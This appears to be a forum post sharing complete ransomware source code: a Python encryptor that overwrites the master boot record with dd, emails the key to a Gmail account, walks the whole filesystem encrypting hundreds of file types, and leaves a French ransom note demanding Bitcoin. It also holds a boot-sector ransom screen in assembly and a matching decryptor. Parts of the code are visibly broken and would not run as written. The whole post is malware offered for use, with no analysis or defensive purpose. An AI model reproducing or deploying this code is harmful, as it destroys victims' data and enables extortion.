- Ransomware.py
- [quode]
- import os
- import sys
- import random
- import struct
- import smtplib
- import string
- import datetime
- import time
- import getpass as gp
- from Crypto.Cipher import AES
- from Crypto.PublicKey import RSA
- from multiprocessing import Pool
- # Function to generate our client ID
- def gen_client_ID(size=12, chars=string.ascii_uppercase + string.digits):
- return ''.join(random.choice(chars) for _ in range(size))
- ID = gen_client_ID(12)
- key = RSA.generate(2048)
- exKey = RSA.exportKey('PEM')
- # Check to see if we're on linux and have root, if so use dd to override the MBR with our bootlocker.
- if sys.platform == 'linux2' and gp.getuser() == 'root':
- try:
- os.system("dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
- except:
- pass
- else:
- try:
- os.system("sudo dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
- except:
- pass
- def send_ID_Key():
- ts = datetime.datetime.now()
- SERVER = "smtp.gmail.com"
- PORT = 587
- USER = "address@gmail.com" # Specify Username Here
- PASS = "prettyflypassword" # Specify Password Here
- FROM = USER
- TO = ["address@gmail.com"]
- SUBJECT = "Ransomware data: "+str(ts)
- MESSAGE = """\Client ID: %s Decryption Key: %s """ % (ID, exKey)
- message = """\ From: %s To: %s Subject: %s %s """ % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
- try:
- server = smtplib.SMTP()
- server.connect(SERVER, PORT)
- server.starttls()
- server.login(USER, PASS)
- server.sendmail(FROM, TO, message)
- server.quit()
- except Exception as e:
- # print e
- pass
- def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):
- if not out_filename:
- out_filename = in_filename + '.crypt'
- iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
- encryptor = AES.new(key, AES.MODE_CBC, iv)
- filesize = os.path.getsize(in_filename)
- with open(in_filename, 'rb') as infile:
- with open(out_filename, 'wb') as outfile:
- outfile.write(struct.pack('<Q', filesize))
- outfile.write(iv)
- while True:
- chunk = infile.read(chunksize)
- if len(chunk) == 0:
- break
- elif len(chunk) % 16 != 0:
- chunk += ' ' * (16 - len(chunk) % 16)
- outfile.write(encryptor.encrypt(chunk))
- def single_arg_encrypt_file(in_filename):
- encrypt_file(key, in_filename)
- def select_files():
- ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv",
- ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
- ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
- ".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", ".exe",
- ".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h",
- ".mov", ".gif", ".txt", ".py", ".pyc", ".jar",".gif",
- ".groups", ".hdd", ".hpp", ".log", ".m2ts", ".m4p", ".mkv",
- ".mpeg", ".ndf", ".nvram", ".ogg", ".ost", ".pab", ".pdb", ".pif",
- ".png", ".qed", ".qcow", ".qcow2", ".rvt", ".st7", ".stm", ".vbox",
- ".vdi", ".vhd", ".vhdx", ".vmdk", ".vmsd", ".vmx", ".vmxf", ".3fr",
- ".3pr", ".ab4", ".accde", ".accdr", ".accdt", ".ach", ".acr", ".adb",
- ".ads", ".agdl", ".ait", ".apj", ".asm", ".awg", ".back", ".backup",
- ".backupdb", ".bay", ".bdb", ".bgt", ".bik", ".bpw", ".cdr3", ".cdr4",
- ".cdr5", ".cdr6", ".cdrw", ".ce1", ".ce2", ".cib", ".craw", ".crw",
- ".csh", ".csl", ".db_journal", ".dc2", ".dcs", ".ddoc", ".ddrw",
- ".der", ".des", ".dgc", ".djvu", ".dng", ".drf", ".dxg", ".eml",
- ".erbsql", ".erf", ".exf", ".ffd", ".fh", ".fhd", ".gray", ".grey",
- ".gry", ".hbk", ".ibd", ".ibz", ".iiq", ".incpas", ".jpe",
- ".kc2", ".kdbx", ".kdc", ".kpdx", ".lua", ".mdc", ".mef", ".mfw",
- ".mmw", ".mny", ".mrw", ".myd", ".ndd", ".nef", ".nk2", ".nop",
- ".nrw", ".ns2", ".ns3", ".ns4", ".nwb", ".nx2", ".nxl", ".nyf",
- ".odb", ".odf", ".odg", ".odm", ".orf", ".otg", ".oth", ".otp",
- ".ots", ".ott", ".p12", ".p7b", ".p7c", ".pdd", ".pem",
- ".plus_muhd", ".plc", ".pot", ".pptx", ".psafe3", ".py",
- ".qba", ".qbr", ".qbw", ".qbx", ".qby", ".raf", ".rat",
- ".raw", ".rdb", ".rwl", ".rwz", ".s3db", ".sd0", ".sda",
- ".sdf", ".sqlite", ".sqlite3", ".sqlitedb", ".sr2", ".srf",
- ".srw", ".st5", ".st8", ".std", ".sti", ".stw", ".stx", ".sxd",
- ".sxg", ".sxi", ".sxm", ".tex", ".wallet", ".wb2", ".wpd",
- ".x11", ".x3f", ".xis", ".ycbcra", ".yuv", ".contact", ".dbx",
- ".doc", ."docx", ".jnt", ".msg", ".oab",".ods", ".pdf", ".pps",
- ".ppsm", ".ppt", ".pptm", ".prf", ".pst", ".rar", ".rtf", ".txt",
- ".wab", ".xls", ".xlsx", ".xml", ".zip", ".1cd", ".7zip", ".accdb",
- ".aoi", ".asf", ".asp", ".aspx", ".asx", ".bak", ".cer", ".cfg",
- ".class", ".config", ".css", ".csv", ".db", ".dds", ".dwg", ".dxf",
- ".flf", ".flv", ".html", ".idx", ".js", ".key", ".kwm", ".laccdb",
- ".ldf", ".lit", ".m3u", ".mbx", ".md", ".mdf", ".mid", ".mlb",
- ".obj", ".odt", ".pages", ".php", ".psd", ".pwm", ".rm", ".safe",
- ".sav", ".save", ".sql", ".srt", ".swf", ".thm", ".vob", ".wav",
- ".wma", ".wmv", ".xlsb", ".3dm", ".aac", ".ai", ".arw", ".cdr",
- ".cls", ".cpi", ".cpp", ".cs", ".db3", ".docm", ".dot", ".dotm",
- ".dotx", ".drw", ".dxb", ".eps", ".fla", ".flac", ".fxg",
- ".java", ".m", ".m4v", ".max", ".mdb", ".pcd", ".pct", ".pl",
- ".potm", ".potx", ".ppam", ".ppsm", ".ppsx", ".pptm", ".ps",
- ".r3d", ".rw2", ".sldm", ".sldx", ".svg", ".tga", ".wps",
- ".xla", ".xlam", ".xlm", ".xlr", ".xlsm", ".xlt", ".xltm",
- ".xltx", ".xlw", ".act", ".adp", ".al", ".bkp", ".blend",
- ".cdf", ".cdx", ".cgm", ".cr2", ".crt", ".dac", ".dbf",
- ".dcr", ".ddd", ".design", ".dtd", ".fdb", ".fff", ".fpx",
- ".h", ".iif", ".indd", ".mos", ".nd", ".nsd", ".nsf",
- ".nsg", ".nsh", ".odc", ".odp", ".oil", ".pas", ".pat",
- ".pef", ".pfx", ".ptx", ".qbb", ".qbm", ".sas7bdat", ".say",
- ".st4", ".st6", ".stc", ".sxc", ".sxw", ".tlg", ".wad",
- ".xlk", ".aiff", ".bin", ".bmp", ".cmt", ".dat", ".dit",
- ".edb", ".flvv"]
- files_to_enc = []
- for root, dirs, files in os.walk("/"):
- for file in files:
- if file.endswith(tuple(ext)):
- files_to_enc.push(os.path.join(root, file))
- # Parallelize execution of encryption function over four subprocesses
- pool = Pool(processes=4)
- pool.map(single_arg_encrypt_file, files_to_enc)
- def note():
- readme = """
- ._______ .______ ._______ .__ __. ______ .__ __
- | ____|| _ \ | ____|| \ | | / || | | |
- | |__ | |_) | | |__ | \| | | ,----'| |__| |
- | __| | / | __| | . ` | | | | __ |
- | | | |\ \----.| |____ | |\ | | `----.| | | |
- |__| | _| `._____||_______||__| \__| \______||__| |__|
- ._______ ._______ ._______ .______ .___ __ ____ ._______ .______
- | \ | ____|| ____|| _ \ \ \ / \ / / | ____|| _ \
- | .--. || |__ | |__ | |_) | \ \/ \/ / | |__ | |_) |
- | | | || __| | __| | ___/ _ \ / | __| | _ <
- | '--' || |____ | |____ | | |_| \ /\ / | |____ | |_) |
- |_______/ |_______||_______|| _| \__/ \__/ |_______||______/
- Bonjour,
- Malheureusement, tous vos fichiers ont été chiffrés avec un cryptage de grade militaire
- il vous sera donc impossible de les récupérer sans acquerir la clé de chiffrement.
- Envoyer 0,5 Bitcoin a "ADRESSE BITCON ICI"
- une fois votre versement éffectuer envoyer nous un email a "ransomware@yopmail.fr"
- avec le numero de la transaction Bitcoin ainsi que votre address email et nous vous enverons
- la clé de chiffrement au plus vite.
- Nous vous remercions de votre patience.
- Bonne journée,
- Le French Deep Web.
- """
- # Windows variant
- # outdir = os.getenv('USERNAME') + "\\Desktop"
- outdir = os.getenv('HOME') + "/Desktop/"
- outfile = outdir + "README"
- handler = open(outputfile, 'w')
- handler.write(outfile, ID)
- handler.close()
- if __name__=="__main__":
- gen_client_ID()
- send_ID_Key()
- try:
- select_files()
- note()
- except Exception as e:
- pass
- [/quode]
- bootlocker.asm
- [quode][BITS 16]
- [ORG 0x7C00]
- MOV SI, Msg
- CALL OutStr
- JMP $
- OutChar:
- MOV AH, 0x0E
- MOV BH, 0x00
- MOV BL, 0x07
- INT 0x10
- RET
- OutStr:
- next_char:
- MOV AL, [SI]
- INC SI
- OR AL, AL
- JZ exit_function
- CALL OutChar
- JMP next_char
- exit_function:
- RET
- Msg db 0xA, 0xD, 0xA, 0xD
- db '################################################################################################', 0xA, 0xD
- db '# #', 0xA, 0xD
- db '# Tous vos fichiers ont été chiffrés avec un cryptage de grade militaire #', 0xA, 0xD
- db '# Il vous sera donc impossible de les récupérer sans acquerir la clé de chiffrement. #', 0xA, 0xD
- db '# #', 0xA, 0xD
- db '# Envoyer 0,5 Bitcoin a "ADRESSE BITCON ICI" #', 0xA, 0xD
- db '# #', 0xA, 0xD
- db '# une fois votre versement éffectuer envoyer nous un email a "ransomware@yopmail.fr" #', 0xA, 0xD
- db '# avec le numero de la transaction Bitcoin ainsi que votre address email #', 0xA, 0xD
- db '# et nous vous enverons #', 0xA, 0xD
- db '# la clé de cryptage ainsi que la méthode pour déchiffrer vos fichiers au plus vite. #', 0xA, 0xD
- db '# #', 0xA, 0xD
- db '# Nous vous remercions de votre patience. #', 0xA, 0xD
- db '# #', 0xA, 0xD
- db '################################################################################################', 0xA, 0xD
- db ' ', 0xA, 0xD
- db '################################################################################################', 0xA, 0xD
- db '# #', 0xA, 0xD
- db '# Malheureusement, il ne vous reste que 7 jours avant que la clé de cryptage ne soit détruite.#', 0xA, 0xD
- db '# Bonne Journée, #', 0xA, 0xD
- db '# Le French Deep Web #', 0xA, 0xD
- db '# #', 0xA, 0xD
- db '################################################################################################', 0
- TIMES 510 - ($ - $$) db 0
- DW 0xAA55
- [/quode]
- Décryption.py
- [quode]
- import os
- import sys
- import struct
- from base64 import b64decode
- from Crypto.Cipher import AES
- from Crypto.PublicKey import RSA
- from multiprocessing import Pool
- # Read in and decode keyfile
- with open('privkey', 'r') as keyfile:
- keyData = keyfile.read().replace('\n', '')
- keyDER = b64decode(keyData)
- key = RSA.importKey(keyDER)
- def decrypt_file(key, in_filename, out_filename=None, chunksize=24*1024):
- # Split .crypt extension to restore file format
- if not out_filename:
- out_filename = os.path.splitext(in_filename)[0]
- with open(in_filename, 'rb') as infile:
- origsize = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0]
- iv = infile.read(16)
- decryptor = AES.new(key, AES.MODE_CBC, iv)
- with open(out_filename, 'wb') as outfile:
- while True:
- chunk = infile.read(chunksize)
- if len(chunk) == 0:
- break
- outfile.write(decryptor.decrypt(chunk))
- # Truncate file to original size
- outfile.truncate(origsize)
- def single_arg_decrypt_file(in_filename):
- decrypt_file(key, in_filename)
- def select_files():
- # Files to be decrypted are identified by .crypt extension
- ext = ".crypt"
- files_to_dec = []
- for root, dirs, files in os.walk("/"):
- for file in files:
- if file.endswith(str(ext)):
- files_to_dec.push(os.path.join(root, file))
- # Parralelize execution of decrypting function over four sub processes
- pool = Pool(processes=4)
- pool.map(single_arg_decrypt_file, files_to_dec)
- if __name__=="__main__":
- select_files()
- [/quode]